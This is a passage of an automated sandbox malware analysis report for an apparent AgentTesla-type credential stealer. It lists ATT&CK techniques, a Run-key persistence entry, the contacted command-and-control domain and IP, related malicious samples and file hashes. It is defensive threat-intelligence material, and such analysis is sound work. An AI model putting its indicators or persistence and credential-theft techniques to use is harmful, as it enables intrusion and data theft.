                        Registry Run Keys / Startup Folder                        		111
                        Process Injection                        		2
                        Obfuscated Files or Information                        		1
                        Credentials in Registry                        		24
                        System Information Discovery                        		Remote Desktop Protocol2
                        Data from Local System                        		11
                        Encrypted Channel                        		Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                        Registry Run Keys / Startup Folder                        		1
                        Software Packing                        		Security Account Manager1
                        Query Registry                        		SMB/Windows Admin Shares1
                        Email Collection                        		1
                        Non-Standard Port                        		Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                        DLL Side-Loading                        		NTDS221
                        Security Software Discovery                        		Distributed Component Object ModelInput Capture2
                        Non-Application Layer Protocol                        		Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                        Masquerading                        		LSA Secrets1
                        Process Discovery                        		SSHKeylogging23
                        Application Layer Protocol                        		Scheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts141
                        Virtualization/Sandbox Evasion                        		Cached Domain Credentials141
                        Virtualization/Sandbox Evasion                        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items111
                        Process Injection                        		DCSync1
                        Application Window Discovery                        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                        System Network Configuration Discovery                        		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1448039 Sample: Copy#51007602.exe Startdate: 27/05/2024 Architecture: WINDOWS Score: 100 25 jahnindustry.shop 2->25 27 api.ipify.org 2->27 29 Snort IDS alert for network traffic 2->29 31 Found malware configuration 2->31 33 Malicious sample detected (through community Yara rule) 2->33 35 9 other signatures 2->35 7 itdtn.exe 3 2->7         started        10 Copy#51007602.exe 1 4 2->10         started        signatures3 process4 file5 37 Antivirus detection for dropped file 7->37 39 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 7->39 41 Machine Learning detection for dropped file 7->41 13 itdtn.exe 14 2 7->13         started        19 C:\Users\user\AppData\Roaming\itdtn.exe, PE32 10->19 dropped 43 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 10->43 45 Drops large PE files 10->45 47 Injects a PE file into a foreign processes 10->47 16 Copy#51007602.exe 15 2 10->16         started        signatures6 process7 dnsIp8 49 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 13->49 51 Tries to steal Mail credentials (via file / registry access) 13->51 53 Tries to harvest and steal ftp login credentials 13->53 55 Tries to harvest and steal browser information (history, passwords, etc) 13->55 21 jahnindustry.shop 66.29.151.236, 49705, 49715, 587 ADVANTAGECOMUS United States 16->21 23 api.ipify.org 104.26.13.205, 443, 49704, 49714 CLOUDFLARENETUS United States 16->23 signatures9

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        Copy#51007602.exe29%VirustotalBrowse
                        Copy#51007602.exe16%ReversingLabs
                        Copy#51007602.exe100%Joe Sandbox ML

                        Dropped Files

                        SourceDetectionScannerLabelLink
                        C:\Users\user\AppData\Roaming\itdtn.exe100%AviraHEUR/AGEN.1332199
                        C:\Users\user\AppData\Roaming\itdtn.exe100%Joe Sandbox ML

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        SourceDetectionScannerLabelLink
                        api.ipify.org1%VirustotalBrowse

                        URLs

                        SourceDetectionScannerLabelLink
                        https://api.ipify.org/0%URL Reputationsafe
                        https://api.ipify.org/0%URL Reputationsafe
                        https://api.ipify.org0%URL Reputationsafe
                        https://stackoverflow.com/q/14436606/233540%URL Reputationsafe
                        https://account.dyn.com/0%URL Reputationsafe
                        https://api.ipify.org/t0%URL Reputationsafe
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                        https://stackoverflow.com/q/11564914/23354;0%URL Reputationsafe
                        https://stackoverflow.com/q/2152978/233540%URL Reputationsafe
                        https://github.com/mgravell/protobuf-neti0%Avira URL Cloudsafe
                        https://github.com/mgravell/protobuf-net0%Avira URL Cloudsafe
                        http://jahnindustry.shop0%Avira URL Cloudsafe
                        https://github.com/mgravell/protobuf-netJ0%Avira URL Cloudsafe
                        https://github.com/mgravell/protobuf-net0%VirustotalBrowse
                        https://github.com/mgravell/protobuf-neti0%VirustotalBrowse
                        https://github.com/mgravell/protobuf-netJ0%VirustotalBrowse

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        jahnindustry.shop
                        		66.29.151.236
                        		truetrue
                          		unknown
                          api.ipify.org
                          		104.26.13.205
                          		truefalseunknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://api.ipify.org/false
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://github.com/mgravell/protobuf-netCopy#51007602.exe, 00000000.00000002.2114770908.00000000045F2000.00000004.00000800.00020000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2114770908.00000000046BE000.00000004.00000800.00020000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2123138110.0000000004F30000.00000004.08000000.00040000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2111351064.0000000002B74000.00000004.00000800.00020000.00000000.sdmp, itdtn.exe, 00000004.00000002.2229535791.0000000003371000.00000004.00000800.00020000.00000000.sdmpfalse
                          • 0%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          		unknown
                          https://api.ipify.orgCopy#51007602.exe, 00000000.00000002.2114770908.0000000003991000.00000004.00000800.00020000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2111351064.0000000002B74000.00000004.00000800.00020000.00000000.sdmp, Copy#51007602.exe, 00000002.00000002.3235618888.0000000003291000.00000004.00000800.00020000.00000000.sdmp, itdtn.exe, 00000004.00000002.2235868873.0000000005056000.00000004.00000800.00020000.00000000.sdmp, itdtn.exe, 00000004.00000002.2229535791.0000000003633000.00000004.00000800.00020000.00000000.sdmp, itdtn.exe, 00000005.00000002.3231826482.000000000042F000.00000040.00000400.00020000.00000000.sdmp, itdtn.exe, 00000005.00000002.3236815937.00000000032DC000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://jahnindustry.shopCopy#51007602.exe, 00000002.00000002.3235618888.0000000003307000.00000004.00000800.00020000.00000000.sdmp, itdtn.exe, 00000005.00000002.3236815937.0000000003347000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://github.com/mgravell/protobuf-netiCopy#51007602.exe, 00000000.00000002.2114770908.00000000045F2000.00000004.00000800.00020000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2114770908.00000000046BE000.00000004.00000800.00020000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2123138110.0000000004F30000.00000004.08000000.00040000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2111351064.0000000002B74000.00000004.00000800.00020000.00000000.sdmp, itdtn.exe, 00000004.00000002.2229535791.0000000003371000.00000004.00000800.00020000.00000000.sdmpfalse
                          • 0%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          		unknown
                          https://stackoverflow.com/q/14436606/23354Copy#51007602.exe, 00000000.00000002.2114770908.00000000045F2000.00000004.00000800.00020000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2111351064.0000000002CEE000.00000004.00000800.00020000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2114770908.00000000046BE000.00000004.00000800.00020000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2123138110.0000000004F30000.00000004.08000000.00040000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2111351064.0000000002B74000.00000004.00000800.00020000.00000000.sdmp, itdtn.exe, 00000004.00000002.2229535791.0000000003371000.00000004.00000800.00020000.00000000.sdmp, itdtn.exe, 00000004.00000002.2229535791.00000000034EF000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://account.dyn.com/Copy#51007602.exe, 00000000.00000002.2114770908.0000000003991000.00000004.00000800.00020000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2111351064.0000000002B74000.00000004.00000800.00020000.00000000.sdmp, itdtn.exe, 00000004.00000002.2235868873.0000000005056000.00000004.00000800.00020000.00000000.sdmp, itdtn.exe, 00000004.00000002.2229535791.0000000003633000.00000004.00000800.00020000.00000000.sdmp, itdtn.exe, 00000005.00000002.3231826482.000000000042F000.00000040.00000400.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://github.com/mgravell/protobuf-netJCopy#51007602.exe, 00000000.00000002.2114770908.00000000045F2000.00000004.00000800.00020000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2114770908.00000000046BE000.00000004.00000800.00020000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2123138110.0000000004F30000.00000004.08000000.00040000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2111351064.0000000002B74000.00000004.00000800.00020000.00000000.sdmp, itdtn.exe, 00000004.00000002.2229535791.0000000003371000.00000004.00000800.00020000.00000000.sdmpfalse
                          • 0%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          		unknown
                          https://api.ipify.org/tCopy#51007602.exe, 00000002.00000002.3235618888.0000000003291000.00000004.00000800.00020000.00000000.sdmp, itdtn.exe, 00000005.00000002.3236815937.00000000032DC000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameCopy#51007602.exe, 00000000.00000002.2111351064.0000000002CEE000.00000004.00000800.00020000.00000000.sdmp, Copy#51007602.exe, 00000002.00000002.3235618888.0000000003291000.00000004.00000800.00020000.00000000.sdmp, itdtn.exe, 00000004.00000002.2229535791.000000000357C000.00000004.00000800.00020000.00000000.sdmp, itdtn.exe, 00000005.00000002.3236815937.00000000032DC000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://stackoverflow.com/q/11564914/23354;Copy#51007602.exe, 00000000.00000002.2114770908.00000000045F2000.00000004.00000800.00020000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2114770908.00000000046BE000.00000004.00000800.00020000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2123138110.0000000004F30000.00000004.08000000.00040000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2111351064.0000000002B74000.00000004.00000800.00020000.00000000.sdmp, itdtn.exe, 00000004.00000002.2229535791.0000000003371000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://stackoverflow.com/q/2152978/23354Copy#51007602.exe, 00000000.00000002.2114770908.00000000045F2000.00000004.00000800.00020000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2114770908.00000000046BE000.00000004.00000800.00020000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2123138110.0000000004F30000.00000004.08000000.00040000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          66.29.151.236
                          		jahnindustry.shopUnited States
                          		19538ADVANTAGECOMUStrue
                          104.26.13.205
                          		api.ipify.orgUnited States
                          		13335CLOUDFLARENETUSfalse

                          General Information

                          Joe Sandbox version:40.0.0 Tourmaline
                          Analysis ID:1448039
                          Start date and time:2024-05-27 15:14:08 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 8m 51s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:8
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:Copy#51007602.exe
                          Detection:MAL
                          Classification:mal100.troj.spyw.evad.winEXE@6/3@2/2
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 91%
                          • Number of executed functions: 495
                          • Number of non-executed functions: 34
                          Cookbook Comments:
                          • Found application associated with file extension: .exe

                          Warnings

                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size exceeded maximum capacity and may have missing disassembly code.
                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          09:15:06API Interceptor17x Sleep call for process: Copy#51007602.exe modified
                          09:15:19API Interceptor18x Sleep call for process: itdtn.exe modified
                          15:14:56AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run itdtn C:\Users\user\AppData\Roaming\itdtn.exe
                          15:15:04AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run itdtn C:\Users\user\AppData\Roaming\itdtn.exe

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          66.29.151.236Doc100057638xls.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                            REF0000QWERT544FILE.vbeGet hashmaliciousAgentTeslaBrowse
                              Doc0781123608.exeGet hashmaliciousAgentTesla, PureLog Stealer, XWormBrowse
                                Doc1000050789.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                  5021036673.exeGet hashmaliciousNanocore, AgentTesla, PureLog StealerBrowse
                                    Vessel Position.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                      fNLCIrX52t.exeGet hashmaliciousAgentTeslaBrowse
                                        IMG1024785000.exeGet hashmaliciousNanocore, AgentTesla, PureLog StealerBrowse
                                          IMG_608900026.022.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                            PAYMENT COPY 02521.exeGet hashmaliciousAgentTesla, PureLog Stealer, XWormBrowse
                                              104.26.13.205ReturnLegend.exeGet hashmaliciousStealitBrowse
                                              • api.ipify.org/?format=json
                                              SecuriteInfo.com.Trojan.DownLoaderNET.960.9931.28151.exeGet hashmaliciousPureLog Stealer, Targeted RansomwareBrowse
                                              • api.ipify.org/
                                              Sky-Beta-Setup.exeGet hashmaliciousStealitBrowse
                                              • api.ipify.org/?format=json
                                              ArenaWarSetup.exeGet hashmaliciousStealitBrowse
                                              • api.ipify.org/?format=json
                                              Sky-Beta Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                              • api.ipify.org/?format=json
                                              E4sbo4F6Sz.exeGet hashmaliciousUnknownBrowse
                                              • api.ipify.org/
                                              E4sbo4F6Sz.exeGet hashmaliciousUnknownBrowse
                                              • api.ipify.org/
                                              SecuriteInfo.com.Win64.RATX-gen.31127.4101.exeGet hashmaliciousPureLog Stealer, Targeted RansomwareBrowse
                                              • api.ipify.org/

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              api.ipify.orgDoc100057638xls.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                              • 104.26.13.205
                                              0000003448.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                              • 104.26.13.205
                                              Stamp invoice copy.xls.exeGet hashmaliciousAgentTeslaBrowse
                                              • 104.26.13.205
                                              GestorRemesasCONFIRMIMING.exeGet hashmaliciousAgentTeslaBrowse
                                              • 172.67.74.152
                                              DRAWING_SHEET_P02405912916 .exeGet hashmaliciousAgentTeslaBrowse
                                              • 172.67.74.152
                                              proforma invoice.bit.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                              • 172.67.74.152
                                              INV 0983 OSY 240524_PDF.exeGet hashmaliciousAgentTeslaBrowse
                                              • 104.26.12.205
                                              https://attachments.office.net/owa/cmangava%40tharisa.com/service.svc/s/GetAttachmentThumbnail?id=AAMkAGE2N2U5NmFkLWIzMjEtNGMwNS1iOWVlLWExNTBkNDk2NTZjMABGAAAAAAAsNFCwuPDISrln6MRbSR5lBwBC4JDOFd8jTJozG%2BNc7YRrAAAAmcUBAABu3YNoqzF8SLI68HoWeAXzAAFRD3sAAAABEgAQAOXLRvcdfU5Kkg7Zx598XsI%3D&thumbnailType=2&token=eyJhbGciOiJSUzI1NiIsImtpZCI6IkU1RDJGMEY4REE5M0I2NzA5QzQzQTlFOEE2MTQzQzAzRDYyRjlBODAiLCJ0eXAiOiJKV1QiLCJ4NXQiOiI1ZEx3LU5xVHRuQ2NRNm5vcGhROEE5WXZtb0EifQ.eyJvcmlnaW4iOiJodHRwczovL291dGxvb2sub2ZmaWNlLmNvbSIsInVjIjoiNTIyZjRhMmM0ZWRmNDA4NjkxMWIwMGFjYzE2ZjgzNzEiLCJzaWduaW5fc3RhdGUiOlsiZHZjX21uZ2QiLCJkdmNfY21wIiwiZHZjX2RtamQiLCJpbmtub3dubnR3ayJdLCJ2ZXIiOiJFeGNoYW5nZS5DYWxsYmFjay5WMSIsImFwcGN0eHNlbmRlciI6Ik93YURvd25sb2FkQDliMDgyOWI5LWJlMzktNDMzNi1hNzY2LWY4YzlkYzJjNzFhNCIsImlzc3JpbmciOiJXVyIsImFwcGN0eCI6IntcIm1zZXhjaHByb3RcIjpcIm93YVwiLFwicHVpZFwiOlwiMTE1MzkwNjY2MTMxNDQwNDI4NFwiLFwic2NvcGVcIjpcIk93YURvd25sb2FkXCIsXCJvaWRcIjpcIjUyMjAyODA5LWJkODUtNGZmOC04NTUwLTRjNzUwZjNhODNlZFwiLFwicHJpbWFyeXNpZFwiOlwiUy0xLTUtMjEtMTAxMjEyODM0Ni0xNjc3NDQzNDQtMTE3Njg1Mjg2MS0xMzc4MTQ4OVwifSIsIm5iZiI6MTcxNjc5NjM3MCwiZXhwIjoxNzE2Nzk2NjcwLCJpc3MiOiIwMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDBAOWIwODI5YjktYmUzOS00MzM2LWE3NjYtZjhjOWRjMmM3MWE0IiwiYXVkIjoiMDAwMDAwMDItMDAwMC0wZmYxLWNlMDAtMDAwMDAwMDAwMDAwL2F0dGFjaG1lbnRzLm9mZmljZS5uZXRAOWIwODI5YjktYmUzOS00MzM2LWE3NjYtZjhjOWRjMmM3MWE0IiwiaGFwcCI6Im93YSJ9.QgmzIBWvZG6gLwDV2SGPl9TdStXctQrpU_xiIGcL5I4eoVDkUPzqcKcrSAnwOD_E73nNMbCTWC-kgcJIIFGhLmh8iFWITRD5MwmaJN23JV7c8rlmzHlxnoqm8tPo98Soui3XZZYSaJZVTruXDBhUCiweHA69qYSoZDJxVUYZDvl5KvXMWJkA_ui0Vq1Sw7pPL5h9t4_QlGAarVBz6O9q21EGSBoX_hWPpcaEGJwoBDVeI-G6VvbkXzy9bJEMEZ6N-WzLyQtuKS9HVJBafIkUxsf0pIhhnJUluyukhnQ1dZohnpQr8e5v0Xoa3SObMFt_C5SeZHG2hFyxqFdeBhKQ_w&X-OWA-CANARY=X-OWA-CANARY_cookie_is_null_or_empty&owa=outlook.office.com&scriptVer=20240517003.15&clientId=1A63CAED249649AEBB5264A13128C2B5&animation=true&persistenceId=80cb7b14-7011-42b1-acde-250d928510f9Get hashmaliciousHTMLPhisherBrowse
                                              • 104.26.13.205
                                              PO_27052024.exeGet hashmaliciousAgentTeslaBrowse
                                              • 104.26.13.205
                                              Remittance#26856.htmlGet hashmaliciousHTMLPhisherBrowse
                                              • 104.26.13.205

                                              ASNs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              CLOUDFLARENETUShttps://github.com/electerm/electerm/releases/download/v1.39.18/electerm-1.39.18-win-x64-installer.exeGet hashmaliciousUnknownBrowse
                                              • 172.64.41.3
                                              https://drive.google.com/uc?export=download&id=12v1VZUwGaH9dJNC24k24Rn9zAkDKRnBDGet hashmaliciousUnknownBrowse
                                              • 172.64.151.101
                                              PxuZ1WpCgf.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                                              • 188.114.97.3
                                              https://web.cinepagal.orgGet hashmaliciousUnknownBrowse
                                              • 188.114.96.3
                                              Doc100057638xls.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                              • 104.26.13.205
                                              hZ80PhOmKK.elfGet hashmaliciousUnknownBrowse
                                              • 104.17.134.249
                                              RECEIPT-CARGO 00009933CRER3S.exeGet hashmaliciousFormBookBrowse
                                              • 23.227.38.32
                                              ctm_260524_pdf.exeGet hashmaliciousFormBookBrowse
                                              • 104.21.40.171
                                              RB_VAC_1.EXE.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                              • 104.21.84.83
                                              https://u44668105.ct.sendgrid.net/ls/click?upn=u001.BTMESiTo6NsF48uIW4-2BrJkEc2YVFzyAaMWnWwgGT9cZqZS45ZZqu4Y-2FXJmZd8BXA8cja_AHV3UK6XjfrXMiZ9J4igW-2FDEUbICycoJ744IkX0PR6FoPBD5ixGfLkyQ9ofRFx1gjy-2BP-2BDUWqu7bhyffh6xflqZsbtNZtMLnpgQoCGrYBrKDAQCrs-2BXh7tVhTtmxcULJOM-2BKcO31hWTdcLyh6xHaFmrsv6JFsx6tjkxHhVyYzmDL2WjDZWPIbWyOCKFNxt29pnc1D6Wos9by2AU7AhdVB3KlHpWThOWm6-2FAP-2Buqng4Vq-2BmwndZ6wQGKVc-2FG51viAW-2FpPzuJOGK4hC-2FF-2FfgyonvDWvDkNa4J3BejflmN-2BuGCUZSHoW4H7oETlKRzn4f7VwMbU0WFOF9ZUfOI6CISxhvZQTsnMYzitMow1nPeu-2Flg0-2FzAaZA27HnZ5WdxtR2wKofgxyBDPpPjMUDCXBmEfEWtT8NXGmNaNpBvJDLI13EkOwRxoG67u0CqbvxxYYK-2F5eu2B-2Bg9JTJRxFbICA7lEJgDZLYhBS-2BbGjIrrRDvHg0hAvMhBJ54TVAoWNvYZYG-2FCqbCuzJrUBI0DoaRAGLq44smm73hnjeG06IT3WQV3A8KkhlXB3fqBFue-2Fd4ydFypfr1PkBzxIk-2FPd1H2pJdMYF-2B7HONDoFax8K-2BBkvfgdiIY-3DGet hashmaliciousUnknownBrowse
                                              • 104.17.245.203
                                              ADVANTAGECOMUSDoc100057638xls.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                              • 66.29.151.236
                                              RB_VAC_1.EXE.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                              • 66.29.137.12
                                              4TH HIRE SOA REMITTANCE_USD280,000.exeGet hashmaliciousFormBookBrowse
                                              • 66.29.149.46
                                              PAYMENT COPY.exeGet hashmaliciousFormBookBrowse
                                              • 66.29.149.46
                                              #U0426#U0438#U0442#U0430#U0442#U0430.exeGet hashmaliciousFormBookBrowse
                                              • 66.29.149.193
                                              REF0000QWERT544FILE.vbeGet hashmaliciousAgentTeslaBrowse
                                              • 66.29.151.236
                                              Offer Document 23.lnkGet hashmaliciousFormBookBrowse
                                              • 66.29.149.46
                                              qtCWL0lgfX.exeGet hashmaliciousFormBookBrowse
                                              • 66.29.149.46
                                              Offer Document 24.lnkGet hashmaliciousFormBookBrowse
                                              • 66.29.149.46
                                              Doc0781123608.exeGet hashmaliciousAgentTesla, PureLog Stealer, XWormBrowse
                                              • 66.29.151.236

                                              JA3 Fingerprints

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              3b5074b1b5d032e5620f69f9f700ff0eyk4ABozmBY.exeGet hashmaliciousRedLineBrowse
                                              • 104.26.13.205
                                              Doc100057638xls.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                              • 104.26.13.205
                                              0000003448.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                              • 104.26.13.205
                                              Stamp invoice copy.xls.exeGet hashmaliciousAgentTeslaBrowse
                                              • 104.26.13.205
                                              GestorRemesasCONFIRMIMING.exeGet hashmaliciousAgentTeslaBrowse
                                              • 104.26.13.205
                                              DRAWING_SHEET_P02405912916 .exeGet hashmaliciousAgentTeslaBrowse
                                              • 104.26.13.205
                                              NUEVA ORDEN DE COMPRAsxlx..exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 104.26.13.205
                                              proforma invoice.bit.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                              • 104.26.13.205
                                              INV 0983 OSY 240524_PDF.exeGet hashmaliciousAgentTeslaBrowse
                                              • 104.26.13.205
                                              PO_27052024.exeGet hashmaliciousAgentTeslaBrowse
                                              • 104.26.13.205

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Copy#51007602.exe.log

                                              Download File
                                              Process:C:\Users\user\Desktop\Copy#51007602.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):716
                                              Entropy (8bit):5.350074230533824
                                              Encrypted:false
                                              SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhayoDLI4MWuPrePEnirkvoDLI4MWuCv:ML9E4KlKDE4KhKiKhRAE4KzeRE4Ks
                                              MD5:F7E80A89B59EFA3CAC428E12420D971C
                                              SHA1:DD2427B85EEC73FBD3C353E5F8D18CF2B8286B00
                                              SHA-256:0731A6A7ED19AAF142738A522427B3EC07B2A64CD105C4D999A301016A4C2DCC
                                              SHA-512:D41797D9C35DFE77511DEC89CB973F342346FCBB09ED1C2BF45521DE2860A002C809EECC765CA6B4D7030316D872AA2CD58EC4455DF279B04DB1BB347233ACA9
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..

                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\itdtn.exe.log

                                              Download File
                                              Process:C:\Users\user\AppData\Roaming\itdtn.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):716
                                              Entropy (8bit):5.350074230533824
                                              Encrypted:false
                                              SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhayoDLI4MWuPrePEnirkvoDLI4MWuCv:ML9E4KlKDE4KhKiKhRAE4KzeRE4Ks
                                              MD5:F7E80A89B59EFA3CAC428E12420D971C
                                              SHA1:DD2427B85EEC73FBD3C353E5F8D18CF2B8286B00
                                              SHA-256:0731A6A7ED19AAF142738A522427B3EC07B2A64CD105C4D999A301016A4C2DCC
                                              SHA-512:D41797D9C35DFE77511DEC89CB973F342346FCBB09ED1C2BF45521DE2860A002C809EECC765CA6B4D7030316D872AA2CD58EC4455DF279B04DB1BB347233ACA9
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
